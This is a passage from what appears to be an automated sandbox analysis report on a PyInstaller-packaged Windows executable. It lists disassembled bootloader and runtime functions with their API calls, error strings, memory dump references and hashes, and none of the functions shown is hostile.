                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: MessageBoxW.USER32 ref: 00007FF6D6E92AD0
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF6D6E939CA), ref: 00007FF6D6E98FA5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                            • Opcode ID: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                                                                                                                            • Instruction ID: 3a0fa2b5b0fdec104b466bdd07f84f6ed7e78339c82d305836759c5e11933b6c
                                                                                                                                                            • Opcode Fuzzy Hash: 4b8f80f614b111e99d886447c0377d3fa2ad0085ce50da6436ff273b72e0facb
                                                                                                                                                            • Instruction Fuzzy Hash: FE217C31F0DB4685EB10DB26E84006DB262EF84BC8F584937DA4E837A4EF3DE5218700
                                                                                                                                                            Function 00007FF6D6E977B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                            • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                            • API String ID: 3231891352-3501660386
                                                                                                                                                            • Opcode ID: 03f41ec499263da2c97a5b990daeb7e2135421ed1fef47a601d8f1cb396ba2f3
                                                                                                                                                            • Instruction ID: a1e4bdcfe6e2f30fa1736c7abc722c82c1b814cbf99f5a02ad5e4e8ecb3e0ab6
                                                                                                                                                            • Opcode Fuzzy Hash: 03f41ec499263da2c97a5b990daeb7e2135421ed1fef47a601d8f1cb396ba2f3
                                                                                                                                                            • Instruction Fuzzy Hash: C351B021F0D66345FE24AB25A9416FD66A19F84BC8F450133ED4ECB7D6EE2EE429C300
                                                                                                                                                            Function 00007FF6D6E97630 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6D6E98DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6D6E97BB1,00000000,?,00000000,00000000,?,00007FF6D6E9153F), ref: 00007FF6D6E9768F
                                                                                                                                                              • Part of subcall function 00007FF6D6E92B10: MessageBoxW.USER32 ref: 00007FF6D6E92BE5
                                                                                                                                                            Strings
                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6D6E976EA
                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6D6E976A3
                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6D6E97666
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                            • API String ID: 1662231829-3498232454
                                                                                                                                                            • Opcode ID: c86ba785b39e1744ff17e8f21851e01a02fd234bd2ff69c05b5589a30fcca8ce
                                                                                                                                                            • Instruction ID: b9572f68a261f0bd9b3871744f65db2041051236d3bb417f7eb9d376bc87fc53
                                                                                                                                                            • Opcode Fuzzy Hash: c86ba785b39e1744ff17e8f21851e01a02fd234bd2ff69c05b5589a30fcca8ce
                                                                                                                                                            • Instruction Fuzzy Hash: 11318551F2D74241FE20E725D9552FE52A1AF987C8F440433DA4EC27DAEE2EE528C700
                                                                                                                                                            Function 00007FF6D6E9E3C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E44D
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E45B
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E485
                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E4F3
                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E4FF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                            • Opcode ID: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                                                                                                                            • Instruction ID: 251fdf38163b2ef6e8479f5d7577b71d67e1e66879d922546f9d2f18df261a5c
                                                                                                                                                            • Opcode Fuzzy Hash: 5cef7e97cf10635b7adbe76254dad29ae16abfe91812266f9aed7336451ff82a
                                                                                                                                                            • Instruction Fuzzy Hash: BA31B025F1E74291EE219B06A4005BD23A4BF44BA8F4D0537DE1DCA790EF3EE5A68B00
                                                                                                                                                            Function 00007FF6D6E98DE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
                                                                                                                                                              • Part of subcall function 00007FF6D6E929C0: MessageBoxW.USER32 ref: 00007FF6D6E92AD0
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98EA0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                            • Opcode ID: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                                                                                                                            • Instruction ID: 08919769eecc2ad7bf3d59538cf0b26dd6707cb8ee998694eb55f20cebe20155
                                                                                                                                                            • Opcode Fuzzy Hash: 7f97f1849ec178b0ff8ea583991b98c80d8c160445cd7602e716bcd8403426a8
                                                                                                                                                            • Instruction Fuzzy Hash: C8214122F1CA4281EB50CB29F84006EA361EF847C8F584533DB4CD3B69EF2EE5618700
                                                                                                                                                            Function 00007FF6D6EABF00 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
                                                                                                                                                            • Instruction ID: 55dd0125a183ee777d5bed2fea0eb309d80046133949926142f9a4804e4a1043
                                                                                                                                                            • Opcode Fuzzy Hash: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
                                                                                                                                                            • Instruction Fuzzy Hash: 12218128F0D24241FA6967359A51A7DA1725F447B0F28473BE87EC76DADE2EB4708B00
                                                                                                                                                            Function 00007FF6D6EB8D9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                            • Opcode ID: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                                                                                            • Instruction ID: 927f6c542bcc611b03d931b19836263dc79027bf90fd7826b43dbdc252470c65
                                                                                                                                                            • Opcode Fuzzy Hash: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                                                                                            • Instruction Fuzzy Hash: 96118E21F1CB4186E3508B06E85472DA6A0FB88FE4F040236EA5EC77A4DF3DD964C744
                                                                                                                                                            Function 00007FF6D6EAC078 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC087
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC0BD
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC0EA
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC0FB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC10C
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC127
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
                                                                                                                                                            • Instruction ID: 596405fd24845e85bf1f57cf2b70305ad3b17008357abc6824267c1326c4c1d0
                                                                                                                                                            • Opcode Fuzzy Hash: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
                                                                                                                                                            • Instruction Fuzzy Hash: DA11D220F0C34242FA559325A69197DA1B28F44BB0F140737E87EC77C6EF3EA4619700
                                                                                                                                                            Function 00007FF6D6E925E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                            • Opcode ID: 7306380fa00786dd34543e50636d1eb829ac66d68af8c251f6b6aa16652876a0
                                                                                                                                                            • Instruction ID: a20cebac78183d61e59a2cd516c9fba5d85a01e232b511e21ffaffc4f21ad57b
                                                                                                                                                            • Opcode Fuzzy Hash: 7306380fa00786dd34543e50636d1eb829ac66d68af8c251f6b6aa16652876a0
                                                                                                                                                            • Instruction Fuzzy Hash: 01316D76A0DA8288EB20DB25E8551FD7360FF88B88F444137EA4D87A9ADF3DD110C700
                                                                                                                                                            Function 00007FF6D6E929C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
                                                                                                                                                              • Part of subcall function 00007FF6D6E98770: GetLastError.KERNEL32(00000000,00007FF6D6E92A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E98797
                                                                                                                                                              • Part of subcall function 00007FF6D6E98770: FormatMessageW.KERNEL32 ref: 00007FF6D6E987C6
                                                                                                                                                              • Part of subcall function 00007FF6D6E98DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF6D6E92AD0
                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF6D6E92AEC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                            • Opcode ID: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                                                                                            • Instruction ID: 7bb031d9a8e43c0cca8c6a3a982c0b6409f8fbbc574b2881912d861f9fe43dae
                                                                                                                                                            • Opcode Fuzzy Hash: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                                                                                            • Instruction Fuzzy Hash: CC316272A2CA8281E730DB14E4516EE6364FF84BC8F804137E68D87A99DF3DD655CB40
                                                                                                                                                            Function 00007FF6D6EAA83C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                                                                                            • Instruction ID: 1e188d67f363329b19ef80fbf39a502840a8fcd53a50ac742fe30c041d58b94b
                                                                                                                                                            • Opcode Fuzzy Hash: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                                                                                            • Instruction Fuzzy Hash: 3FF06261F0DB4281FB248B29E44977D6370AF48B61F54063BD66E862F4CF2ED059D700
                                                                                                                                                            Function 00007FF6D6EBA420 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                            • Instruction ID: 96fe47619872385ebb560718ae11e4221e018e5e2cae59f90d4e6ae85bb83ace
                                                                                                                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                            • Instruction Fuzzy Hash: 0D117322E1CB1701FE54156FE48E37D2141EF55370F140637E97E866EBCE2EA8624144
                                                                                                                                                            Function 00007FF6D6EAC140 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC15F
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC17E
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC1A6
